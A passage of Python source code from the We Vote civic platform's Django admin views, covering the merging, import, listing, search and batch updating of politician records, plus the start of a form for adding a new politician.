politician1_linked_candidates_count += 1\n if is_first:\n is_first = False\n else:\n politician1_linked_candidate_names += ', '\n politician1_linked_candidate_names += one_candidate.candidate_name\n if positive_value_exists(one_candidate.candidate_year):\n politician1_linked_candidate_names += ' (' + str(one_candidate.candidate_year) + ')'\n if positive_value_exists(one_candidate.we_vote_hosted_profile_image_url_large):\n politician1_linked_candidate_photos.append(one_candidate.we_vote_hosted_profile_image_url_large)\n results = candidate_list_manager.retrieve_all_offices_for_candidate(\n candidate_we_vote_id=one_candidate.we_vote_id,\n read_only=True)\n if results['office_list_found']:\n for one_office in results['office_list']:\n if is_first_office:\n is_first_office = False\n else:\n politician1_linked_candidate_offices += ', '\n politician1_linked_candidate_district_names += ', '\n politician1_linked_candidate_offices += one_office.office_name\n politician1_linked_candidate_district_names += str(one_office.district_name)\n politician_option1_for_template.linked_candidates_count = politician1_linked_candidates_count\n politician_option1_for_template.linked_candidate_district_names = politician1_linked_candidate_district_names\n politician_option1_for_template.linked_candidate_names = politician1_linked_candidate_names\n politician_option1_for_template.linked_candidate_offices = politician1_linked_candidate_offices\n politician_option1_for_template.linked_candidate_photos = politician1_linked_candidate_photos\n\n politician2_linked_candidates_count = 0\n politician2_linked_candidate_district_names = ''\n politician2_linked_candidate_names = ''\n politician2_linked_candidate_offices = ''\n politician2_linked_candidate_photos = []\n politician2_candidate_results = candidate_list_manager.retrieve_candidates_from_politician(\n politician_id=politician_option2_for_template.id,\n politician_we_vote_id=politician_option2_for_template.we_vote_id,\n read_only=True)\n if politician2_candidate_results['candidate_list_found']:\n is_first = True\n is_first_office = True\n for one_candidate in politician2_candidate_results['candidate_list']:\n politician2_linked_candidates_count += 1\n if is_first:\n is_first = False\n else:\n politician2_linked_candidate_names += ', '\n politician2_linked_candidate_names += one_candidate.candidate_name\n if positive_value_exists(one_candidate.candidate_year):\n politician2_linked_candidate_names += ' (' + str(one_candidate.candidate_year) + ')'\n if positive_value_exists(one_candidate.we_vote_hosted_profile_image_url_large):\n politician2_linked_candidate_photos.append(one_candidate.we_vote_hosted_profile_image_url_large)\n results = candidate_list_manager.retrieve_all_offices_for_candidate(\n candidate_we_vote_id=one_candidate.we_vote_id,\n read_only=True)\n if results['office_list_found']:\n for one_office in results['office_list']:\n if is_first_office:\n is_first_office = False\n else:\n politician2_linked_candidate_offices += ', '\n politician2_linked_candidate_district_names += ', '\n politician2_linked_candidate_offices += one_office.office_name\n politician2_linked_candidate_district_names += str(one_office.district_name)\n politician_option2_for_template.linked_candidates_count = politician2_linked_candidates_count\n politician_option2_for_template.linked_candidate_district_names = politician2_linked_candidate_district_names\n politician_option2_for_template.linked_candidate_names = politician2_linked_candidate_names\n politician_option2_for_template.linked_candidate_offices = politician2_linked_candidate_offices\n politician_option2_for_template.linked_candidate_photos = politician2_linked_candidate_photos\n\n messages_on_stage = get_messages(request)\n template_values = {\n 'conflict_values': politician_merge_conflict_values,\n 'messages_on_stage': messages_on_stage,\n 'politician_option1': politician_option1_for_template,\n 'politician_option2': politician_option2_for_template,\n 'remove_duplicate_process': remove_duplicate_process,\n 'state_code': state_code,\n }\n return render(request, 'politician/politician_merge.html', template_values)\n\n\n@login_required\ndef politicians_import_from_master_server_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'admin'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n if WE_VOTE_SERVER_ROOT_URL in POLITICIANS_SYNC_URL:\n messages.add_message(request, messages.ERROR, \"Cannot sync with Master We Vote Server -- \"\n \"this is the Master We Vote Server.\")\n return HttpResponseRedirect(reverse('admin_tools:admin_home', args=()))\n\n google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))\n state_code = request.GET.get('state_code', '')\n\n results = politicians_import_from_master_server(request, state_code)\n\n if not results['success']:\n if 'POLITICIAN_LIST_MISSING' in results['status']:\n messages.add_message(request, messages.INFO,\n 'Politician import completed, and it returned no politicians, but this is not '\n 'necessarily a problem! It might be that are no local politicians running for office '\n 'in this election.')\n else:\n messages.add_message(request, messages.ERROR, results['status'])\n else:\n messages.add_message(request, messages.INFO, 'Politician import completed. '\n 'Saved: {saved}, Updated: {updated}, '\n 'Duplicates skipped: '\n '{duplicates_removed}, '\n 'Not processed: {not_processed}'\n ''.format(saved=results['saved'],\n updated=results['updated'],\n duplicates_removed=results['duplicates_removed'],\n not_processed=results['not_processed']))\n return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + \"?google_civic_election_id=\" +\n str(google_civic_election_id) + \"&state_code=\" + str(state_code))\n\n\n@login_required\ndef politician_list_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'partner_organization', 'political_data_viewer', 'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n messages_on_stage = get_messages(request)\n state_code = request.GET.get('state_code', '')\n politician_search = request.GET.get('politician_search', '')\n google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))\n # run_scripts = positive_value_exists(request.GET.get('run_scripts', False))\n run_scripts = True\n show_all = positive_value_exists(request.GET.get('show_all', False))\n show_battleground = positive_value_exists(request.GET.get('show_battleground', False))\n show_related_candidates = positive_value_exists(request.GET.get('show_related_candidates', False))\n show_ocd_id_state_mismatch = positive_value_exists(request.GET.get('show_ocd_id_state_mismatch', False))\n show_politicians_with_email = positive_value_exists(request.GET.get('show_politicians_with_email', False))\n\n state_list = STATE_CODE_MAP\n sorted_state_list = sorted(state_list.items())\n\n # When we were preparing to remove the field 'politician_email_address', we wanted to make sure\n # they had all be transferred. This verifies it.\n # # Are there any entries where politician_email doesn't match politician_email_address?\n # politician_query = Politician.objects.all()\n # politician_query = politician_query.exclude(\n # Q(politician_email_address__isnull=True) |\n # Q(politician_email_address=\"\")\n # )\n # # Do not return entries where the values already match\n # politician_query = politician_query.exclude(politician_email__iexact=F('politician_email_address'))\n # list_found = list(politician_query[:10]) # Only find the first 10 entries\n # if len(list_found) > 0:\n # we_vote_id_string = ''\n # for one_politician in list_found:\n # we_vote_id_string += str(one_politician.we_vote_id) + \" \"\n # messages.add_message(request, messages.ERROR,\n # 'politician_email mismatch with politician_email_address: ' + str(we_vote_id_string))\n\n # Make sure we have a version of the politician's name without a middle initial (for matching endorsements)\n generate_google_civic_name_alternates = True\n number_to_generate = 1000\n if generate_google_civic_name_alternates and positive_value_exists(state_code) and run_scripts:\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(google_civic_name_alternates_generated=False)\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_generate if total_to_convert > number_to_generate else 0\n politician_list_to_convert = list(politician_query[:number_to_generate])\n update_list = []\n updates_needed = False\n updates_made = 0\n for one_politician in politician_list_to_convert:\n results = add_alternate_names_to_next_spot(\n politician=one_politician,\n )\n if results['values_changed']:\n politician = results['politician']\n politician.google_civic_name_alternates_generated = True\n update_list.append(politician)\n updates_needed = True\n updates_made += 1\n elif results['success']:\n one_politician.google_civic_name_alternates_generated = True\n update_list.append(one_politician)\n updates_needed = True\n if updates_needed:\n try:\n Politician.objects.bulk_update(update_list, [\n 'google_civic_name_alternates_generated',\n 'google_civic_candidate_name',\n 'google_civic_candidate_name2',\n 'google_civic_candidate_name3',\n ])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} google_civic_name_alternates_generated. \"\n \"{total_to_convert_after:,} remaining.\"\n \"\".format(total_to_convert_after=total_to_convert_after,\n updates_made=updates_made))\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"ERROR with google_civic_name_alternates_generated: {e} \"\n \"\".format(e=e))\n\n # Create seo_friendly_path for all politicians who currently don't have one\n generate_seo_friendly_path_updates = True # Set False on local machine for now\n number_to_create = 1000\n if generate_seo_friendly_path_updates and run_scripts:\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(\n Q(seo_friendly_path__isnull=True) |\n Q(seo_friendly_path=\"\")\n )\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_create if total_to_convert > number_to_create else 0\n politician_list_to_convert = list(politician_query[:number_to_create])\n politician_manager = PoliticianManager()\n update_list = []\n updates_needed = False\n updates_made = 0\n timezone = pytz.timezone(\"America/Los_Angeles\")\n datetime_now = timezone.localize(datetime.now())\n for one_politician in politician_list_to_convert:\n results = politician_manager.generate_seo_friendly_path(\n politician_name=one_politician.politician_name,\n politician_we_vote_id=one_politician.we_vote_id,\n state_code=one_politician.state_code,\n )\n if results['seo_friendly_path_found']:\n one_politician.seo_friendly_path = results['seo_friendly_path']\n one_politician.seo_friendly_path_date_last_updated = datetime_now\n update_list.append(one_politician)\n updates_needed = True\n updates_made += 1\n if updates_needed:\n try:\n Politician.objects.bulk_update(update_list, ['seo_friendly_path', 'seo_friendly_path_date_last_updated'])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} politicians updated with new seo_friendly_path. \"\n \"{total_to_convert_after:,} remaining.\"\n \"\".format(total_to_convert_after=total_to_convert_after,\n updates_made=updates_made))\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"ERROR with generate_seo_friendly_path_updates: {e} \"\n \"\".format(e=e))\n\n # Create default CampaignX for all politicians who currently don't have one\n generate_campaignx_for_every_politician = False\n number_to_create = 1000\n if generate_campaignx_for_every_politician and run_scripts:\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(\n Q(linked_campaignx_we_vote_id__isnull=True) |\n Q(linked_campaignx_we_vote_id=\"\")\n )\n politician_query = politician_query.exclude(\n Q(seo_friendly_path__isnull=True) |\n Q(seo_friendly_path=\"\")\n )\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_create if total_to_convert > number_to_create else 0\n politician_list_to_convert = list(politician_query[:number_to_create])\n update_list = []\n updates_needed = False\n updates_made = 0\n timezone = pytz.timezone(\"America/Los_Angeles\")\n datetime_now = timezone.localize(datetime.now())\n for one_politician in politician_list_to_convert:\n results = generate_campaignx_for_politician(\n datetime_now=datetime_now,\n politician=one_politician,\n save_individual_politician=False,\n )\n if results['success'] and results['campaignx_created']:\n one_politician = results['politician']\n update_list.append(one_politician)\n updates_needed = True\n updates_made += 1\n\n if updates_needed:\n try:\n Politician.objects.bulk_update(\n update_list, ['linked_campaignx_we_vote_id', 'linked_campaignx_we_vote_id_date_last_updated'])\n messages.add_message(request, messages.INFO,\n \"Generated CampaignX for {updates_made:,} politicians. \"\n \"{total_to_convert_after:,} remaining.\"\n \"\".format(total_to_convert_after=total_to_convert_after,\n updates_made=updates_made))\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"ERROR with generate_campaignx_for_every_politician: {e} \"\n \"\".format(e=e))\n\n # Find all politicians with linked_campaignx_we_vote_id and make sure Campaignx\n # entry includes linked_politician_we_vote_id\n # We don't want to always leave this on\n update_campaignx_with_linked_politician_we_vote_id = True\n number_to_update = 7000 # We have to run this routine on the entire state\n if update_campaignx_with_linked_politician_we_vote_id and positive_value_exists(state_code) and run_scripts:\n update_campaignx_with_linked_politician_we_vote_id_status = \"\"\n politician_query = Politician.objects.all()\n politician_query = politician_query.filter(linked_campaignx_we_vote_id__isnull=False)\n politician_query = politician_query.filter(state_code__iexact=state_code)\n total_to_convert = politician_query.count()\n total_to_convert_after = total_to_convert - number_to_update if total_to_convert > number_to_update else 0\n politician_list_to_convert = list(politician_query[:number_to_update])\n campaignx_we_vote_id_list = []\n politician_dict_by_campaign_we_vote_id = {}\n politicians_with_linked_campaignx_we_vote_id_count = 0\n for one_politician in politician_list_to_convert:\n if positive_value_exists(one_politician.linked_campaignx_we_vote_id):\n politicians_with_linked_campaignx_we_vote_id_count += 1\n if one_politician.linked_campaignx_we_vote_id not in campaignx_we_vote_id_list:\n campaignx_we_vote_id_list.append(one_politician.linked_campaignx_we_vote_id)\n politician_dict_by_campaign_we_vote_id[one_politician.linked_campaignx_we_vote_id] = one_politician\n\n update_list = []\n updates_needed = False\n updates_made = 0\n\n from campaign.models import CampaignX\n campaignx_query = CampaignX.objects.all()\n campaignx_query = campaignx_query.filter(we_vote_id__in=campaignx_we_vote_id_list)\n campaignx_list = list(campaignx_query)\n campaignx_with_linked_politician_we_vote_id_count = 0\n for one_campaignx in campaignx_list:\n if one_campaignx.we_vote_id in politician_dict_by_campaign_we_vote_id:\n one_politician = politician_dict_by_campaign_we_vote_id[one_campaignx.we_vote_id]\n if hasattr(one_politician, 'we_vote_id') and positive_value_exists(one_politician.we_vote_id):\n if one_campaignx.linked_politician_we_vote_id != one_politician.we_vote_id:\n one_campaignx.linked_politician_we_vote_id = one_politician.we_vote_id\n update_list.append(one_campaignx)\n updates_made += 1\n if not updates_needed:\n updates_needed = True\n\n if positive_value_exists(one_campaignx.linked_politician_we_vote_id):\n campaignx_with_linked_politician_we_vote_id_count += 1\n\n if updates_needed:\n try:\n CampaignX.objects.bulk_update(\n update_list, ['linked_politician_we_vote_id'])\n update_campaignx_with_linked_politician_we_vote_id_status += \\\n \"UPDATES MADE: {updates_made:,} politicians updated with new linked_campaignx_we_vote_id. \" \\\n \"{total_to_convert_after:,} remaining.\" \\\n \"\".format(\n total_to_convert_after=total_to_convert_after,\n updates_made=updates_made)\n except Exception as e:\n update_campaignx_with_linked_politician_we_vote_id_status += \\\n \"ERROR with update_campaignx_with_linked_politician_we_vote_id: {e} \" \\\n \"\".format(e=e)\n elif positive_value_exists(campaignx_with_linked_politician_we_vote_id_count):\n update_campaignx_with_linked_politician_we_vote_id_status += \\\n \"NO UPDATES: {campaignx_with_linked_politician_we_vote_id_count} CampaignX entries \" \\\n \"already have linked_politician_we_vote_id. \" \\\n \"\".format(\n campaignx_with_linked_politician_we_vote_id_count=campaignx_with_linked_politician_we_vote_id_count)\n if positive_value_exists(update_campaignx_with_linked_politician_we_vote_id_status):\n update_campaignx_with_linked_politician_we_vote_id_status = \\\n update_campaignx_with_linked_politician_we_vote_id_status + \\\n \" (SCRIPT update_campaignx_with_linked_politician_we_vote_id) \"\n\n messages.add_message(request, messages.INFO, update_campaignx_with_linked_politician_we_vote_id_status)\n\n politician_list = []\n politician_list_count = 0\n try:\n politician_query = Politician.objects.using('readonly').all()\n if positive_value_exists(show_battleground):\n year_filters = []\n for year_integer in IS_BATTLEGROUND_YEARS_AVAILABLE:\n if positive_value_exists(year_integer):\n is_battleground_race_key = 'is_battleground_race_' + str(year_integer)\n one_year_filter = Q(**{is_battleground_race_key: True})\n year_filters.append(one_year_filter)\n if len(year_filters) > 0:\n # Add the first query\n final_filters = year_filters.pop()\n # ...and \"OR\" the remaining items in the list\n for item in year_filters:\n final_filters |= item\n politician_query = politician_query.filter(final_filters)\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n if positive_value_exists(show_politicians_with_email):\n politician_query = \\\n politician_query.annotate(politician_email_address_length=Length('politician_email_address'))\n politician_query = politician_query.annotate(politician_email_length=Length('politician_email'))\n politician_query = politician_query.annotate(politician_email2_length=Length('politician_email2'))\n politician_query = politician_query.annotate(politician_email3_length=Length('politician_email3'))\n politician_query = politician_query.filter(\n Q(politician_email_address_length__gt=2) |\n Q(politician_email_length__gt=2) |\n Q(politician_email2_length__gt=2) |\n Q(politician_email3_length__gt=2)\n )\n if positive_value_exists(show_ocd_id_state_mismatch):\n politician_query = politician_query.filter(ocd_id_state_mismatch_found=True)\n\n if positive_value_exists(politician_search):\n search_words = politician_search.split()\n for one_word in search_words:\n filters = []\n\n new_filter = Q(first_name__iexact=one_word)\n filters.append(new_filter)\n\n new_filter = (\n Q(google_civic_candidate_name__icontains=one_word) |\n Q(google_civic_candidate_name2__icontains=one_word) |\n Q(google_civic_candidate_name3__icontains=one_word)\n )\n filters.append(new_filter)\n\n new_filter = Q(last_name__iexact=one_word)\n filters.append(new_filter)\n\n new_filter = Q(linked_campaignx_we_vote_id__iexact=one_word)\n filters.append(new_filter)\n\n new_filter = (\n Q(politician_email__icontains=one_word) |\n Q(politician_email2__icontains=one_word) |\n Q(politician_email3__icontains=one_word)\n )\n filters.append(new_filter)\n\n new_filter = Q(politician_name__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = (\n Q(politician_twitter_handle__icontains=one_word) |\n Q(politician_twitter_handle2__icontains=one_word) |\n Q(politician_twitter_handle3__icontains=one_word) |\n Q(politician_twitter_handle4__icontains=one_word) |\n Q(politician_twitter_handle5__icontains=one_word)\n )\n filters.append(new_filter)\n\n new_filter = Q(political_party__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = Q(seo_friendly_path__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = Q(vote_usa_politician_id__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = Q(we_vote_id__iexact=one_word)\n filters.append(new_filter)\n\n # Add the first query\n if len(filters):\n final_filters = filters.pop()\n\n # ...and \"OR\" the remaining items in the list\n for item in filters:\n final_filters |= item\n\n politician_query = politician_query.filter(final_filters)\n\n politician_list_count = politician_query.count()\n if not positive_value_exists(show_all):\n politician_list = politician_query.order_by('politician_name')[:25]\n else:\n # We still want to limit to 200\n politician_list = politician_query.order_by('politician_name')[:200]\n except ObjectDoesNotExist:\n # This is fine\n pass\n\n # Attach candidates linked to these politicians\n temp_politician_list = []\n for one_politician in politician_list:\n try:\n linked_candidate_query = CandidateCampaign.objects.using('readonly').all()\n linked_candidate_query = linked_candidate_query.filter(\n Q(politician_we_vote_id__iexact=one_politician.we_vote_id) |\n Q(politician_id=one_politician.id))\n linked_candidate_list_count = linked_candidate_query.count()\n one_politician.linked_candidate_list_count = linked_candidate_list_count\n temp_politician_list.append(one_politician)\n except Exception as e:\n pass\n\n politician_list = temp_politician_list\n\n # Cycle through all Politicians and find unlinked Candidates that *might* be \"children\" of this politician\n if show_related_candidates:\n temp_politician_list = []\n for one_politician in politician_list:\n try:\n related_candidate_list = CandidateCampaign.objects.using('readonly').all()\n related_candidate_list = related_candidate_list.exclude(politician_we_vote_id=one_politician.we_vote_id)\n\n filters = []\n new_filter = Q(candidate_name__icontains=one_politician.first_name) & \\\n Q(candidate_name__icontains=one_politician.last_name)\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle) |\n Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle)\n )\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle2):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle2) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle2) |\n Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle2)\n )\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle3):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle3) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle3) |\n Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle3)\n )\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle4):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle4) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle4) |\n Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle4)\n )\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle5):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle5) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle5) |\n Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle5)\n )\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.vote_smart_id):\n new_filter = Q(vote_smart_id=one_politician.vote_smart_id)\n filters.append(new_filter)\n\n # Add the first query\n if len(filters):\n final_filters = filters.pop()\n\n # ...and \"OR\" the remaining items in the list\n for item in filters:\n final_filters |= item\n\n related_candidate_list = related_candidate_list.filter(final_filters)\n\n related_candidate_list_count = related_candidate_list.count()\n except Exception as e:\n related_candidate_list_count = 0\n\n one_politician.related_candidate_list_count = related_candidate_list_count\n temp_politician_list.append(one_politician)\n\n politician_list = temp_politician_list\n\n # Now find all representative ids related to this politician\n temp_politician_list = []\n for one_politician in politician_list:\n if one_politician.we_vote_id:\n try:\n queryset = Representative.objects.all()\n queryset = queryset.filter(politician_we_vote_id__iexact=one_politician.we_vote_id)\n linked_representative_we_vote_id_list = []\n linked_representative_list = list(queryset)\n for representative in linked_representative_list:\n linked_representative_we_vote_id_list.append(representative.we_vote_id)\n one_politician.linked_representative_we_vote_id_list = linked_representative_we_vote_id_list\n except Exception as e:\n related_candidate_list_count = 0\n\n temp_politician_list.append(one_politician)\n\n politician_list = temp_politician_list\n\n election_list = Election.objects.order_by('-election_day_text')\n\n messages.add_message(request, messages.INFO,\n \"Politician Count: {politician_list_count:,}\"\n \"\".format(politician_list_count=politician_list_count))\n\n if 'localhost' in WEB_APP_ROOT_URL:\n web_app_root_url = 'https://localhost:3000'\n else:\n web_app_root_url = 'https://quality.WeVote.US'\n template_values = {\n 'messages_on_stage': messages_on_stage,\n 'google_civic_election_id': google_civic_election_id,\n 'politician_list': politician_list,\n 'politician_search': politician_search,\n 'election_list': election_list,\n 'show_all': show_all,\n 'show_battleground': show_battleground,\n 'show_politicians_with_email': show_politicians_with_email,\n 'show_related_candidates': show_related_candidates,\n 'show_ocd_id_state_mismatch': show_ocd_id_state_mismatch,\n 'state_code': state_code,\n 'state_list': sorted_state_list,\n 'web_app_root_url': web_app_root_url,\n }\n return render(request, 'politician/politician_list.html', template_values)\n\n\n@login_required\ndef politician_merge_process_view(request):\n \"\"\"\n Process the merging of two politicians\n :param request:\n :return:\n \"\"\"\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n status = ''\n politician_manager = PoliticianManager()\n\n merge = request.POST.get('merge', False)\n skip = request.POST.get('skip', False)\n\n # Politician 1 is the one we keep, and Politician 2 is the one we will merge into Politician 1\n politician1_we_vote_id = request.POST.get('politician1_we_vote_id', 0)\n politician2_we_vote_id = request.POST.get('politician2_we_vote_id', 0)\n google_civic_election_id = request.POST.get('google_civic_election_id', 0)\n redirect_to_politician_list = request.POST.get('redirect_to_politician_list', False)\n remove_duplicate_process = request.POST.get('remove_duplicate_process', False)\n state_code = request.POST.get('state_code', '')\n\n if positive_value_exists(skip):\n results = politician_manager.update_or_create_politicians_are_not_duplicates(\n politician1_we_vote_id, politician2_we_vote_id)\n if results['success']:\n queryset = PoliticiansArePossibleDuplicates.objects.filter(\n politician1_we_vote_id__iexact=politician1_we_vote_id,\n politician2_we_vote_id__iexact=politician2_we_vote_id,\n )\n queryset.delete()\n if not results['new_politicians_are_not_duplicates_created']:\n messages.add_message(request, messages.ERROR, 'Could not save politicians_are_not_duplicates entry: ' +\n results['status'])\n messages.add_message(request, messages.INFO, 'Prior politicians skipped, and not merged.')\n return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n politician1_results = politician_manager.retrieve_politician(\n politician_we_vote_id=politician1_we_vote_id,\n read_only=True)\n if politician1_results['politician_found']:\n politician1_on_stage = politician1_results['politician']\n else:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician 1.')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n '?google_civic_election_id=' + str(google_civic_election_id) +\n '&state_code=' + str(state_code))\n\n politician2_results = politician_manager.retrieve_politician_from_we_vote_id(politician2_we_vote_id)\n if politician2_results['politician_found']:\n politician2_on_stage = politician2_results['politician']\n else:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician 2.')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n '?google_civic_election_id=' + str(google_civic_election_id) +\n '&state_code=' + str(state_code))\n\n # Gather choices made from merge form\n conflict_results = figure_out_politician_conflict_values(politician1_on_stage, politician2_on_stage)\n politician_merge_conflict_values = conflict_results['politician_merge_conflict_values']\n if not conflict_results['success']:\n status += conflict_results['status']\n messages.add_message(request, messages.ERROR, status)\n admin_merge_choices = {}\n clear_these_attributes_from_politician2 = []\n for attribute in POLITICIAN_UNIQUE_IDENTIFIERS:\n conflict_value = politician_merge_conflict_values.get(attribute, None)\n if conflict_value == \"CONFLICT\":\n choice = request.POST.get(attribute + '_choice', '')\n if politician2_we_vote_id == choice:\n admin_merge_choices[attribute] = getattr(politician2_on_stage, attribute)\n if attribute in POLITICIAN_UNIQUE_ATTRIBUTES_TO_BE_CLEARED:\n clear_these_attributes_from_politician2.append(attribute)\n elif conflict_value == \"POLITICIAN2\":\n admin_merge_choices[attribute] = getattr(politician2_on_stage, attribute)\n if attribute in POLITICIAN_UNIQUE_ATTRIBUTES_TO_BE_CLEARED:\n clear_these_attributes_from_politician2.append(attribute)\n\n merge_results = merge_these_two_politicians(\n politician1_we_vote_id,\n politician2_we_vote_id,\n admin_merge_choices,\n clear_these_attributes_from_politician2)\n\n if positive_value_exists(merge_results['politicians_merged']):\n politician = merge_results['politician']\n messages.add_message(request, messages.INFO, \"Politician '{politician_name}' merged.\"\n \"\".format(politician_name=politician.politician_name))\n queryset = PoliticiansArePossibleDuplicates.objects.filter(\n politician1_we_vote_id__iexact=politician1_we_vote_id,\n politician2_we_vote_id__iexact=politician2_we_vote_id,\n )\n queryset.delete()\n else:\n # NOTE: We could also redirect to a page to look specifically at these two politicians, but this should\n # also get you back to looking at the two politicians\n messages.add_message(request, messages.ERROR, merge_results['status'])\n return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&auto_merge_off=1\" +\n \"&state_code=\" + str(state_code))\n\n if redirect_to_politician_list:\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n '?google_civic_election_id=' + str(google_civic_election_id) +\n '&state_code=' + str(state_code))\n\n if remove_duplicate_process:\n return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician1_on_stage.id,)))\n\n\n@login_required\ndef politician_new_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n google_civic_election_id = request.GET.get('google_civic_election_id', 0)\n contest_office_id = request.GET.get('contest_office_id', 0)\n\n # These variables are here because there was an error on the edit_process_view and the voter needs to try again\n politician_name = request.GET.get('politician_name', \"\")\n google_civic_candidate_name = request.GET.get('google_civic_candidate_name', \"\")\n google_civic_candidate_name2 = request.GET.get('google_civic_candidate_name2', \"\")\n google_civic_candidate_name3 = request.GET.get('google_civic_candidate_name3', \"\")\n state_code = request.GET.get('state_code', \"\")\n politician_twitter_handle = request.GET.get('politician_twitter_handle', \"\")\n politician_twitter_handle2 = request.GET.get('politician_twitter_handle2', \"\")\n politician_twitter_handle3 = request.GET.get('politician_twitter_handle3', \"\")\n politician_twitter_handle4 = request.GET.get('politician_twitter_handle4', \"\")\n politician_twitter_handle5 = request.GET.get('politician_twitter_handle5', \"\")\n politician_url = request.GET.get('politician_url', \"\")\n politician_url2 = request.GET.get('politician_url2', \"\")\n politician_url3 = request.GET.get('politician_url3', \"\")\n politician_url4 = request.GET.get('politician_url4', \"\")\n politician_url5 = request.GET.get('politician_url5', \"\")\n political_party = request.GET.get('political_party', \"\")\n ballot_guide_official_statement = request.GET.get('ballot_guide_official_statement', \"\")\n vote_smart_id = request.GET.get('vote_smart_id', \"\")\n maplight_id = request.GET.get('maplight_id', \"\")\n politician_we_vote_id = request.GET.get('politician_we_vote_id', \"\")\n gender = request.GET.get('gender', \"U\")\n gender_likelihood = request.GET.get('gender_likelihood', \"\")\n\n # These are the Offices already entered for this election\n try:\n contest_office_list = ContestOffice.objects.order_by('office_name')\n contest_office_list = contest_office_list.filter(google_civic_election_id=google_civic_election_id)\n except Exception as e:\n handle_record_not_found_exception(e, logger=logger)\n contest_office_list = []\n\n # It's helpful to see existing politicians when entering a new politician\n politician_list = []\n try:\n politician_list = Politician.objects.all()\n if positive_value_exists(google_civic_election_id):\n politician_list = politician_list.filter(google_civic_election_id=google_civic_election_id)\n if positive_value_exists(contest_office_id):\n politician_list = politician_list.filter(contest_office_id=contest_office_id)\n politician_list = politician_list.order_by('politician_name')[:500]\n except Politician.DoesNotExist:\n # This is fine, create new\n pass\n\n messages_on_stage = get_messages(request)\n template_values = {\n 'messages_on_stage': messages_on_stage,\n 'office_list': contest_office_list,\n 'contest_office_id': contest_office_id, # Pass in separately for the template to work\n 'gender': gender,\n 'gender_likelihood': gender_likelihood,\n 'google_civic_election_id': google_civic_election_id,\n 'politician_list': politician_list,\n # Incoming variables, not saved yet\n 'politician_name': politician_name,\n 'google_civic_candidate_name': google_civic_candidate_name,\n 'google_civic_candidate_name2': google_civic_candidate_name2,\n 'google_civic_candidate_name3': google_civic_candidate_name3,\n 'state_code': state_code,\n 'politician_twitter_handle': politician_twitter_handle,\n 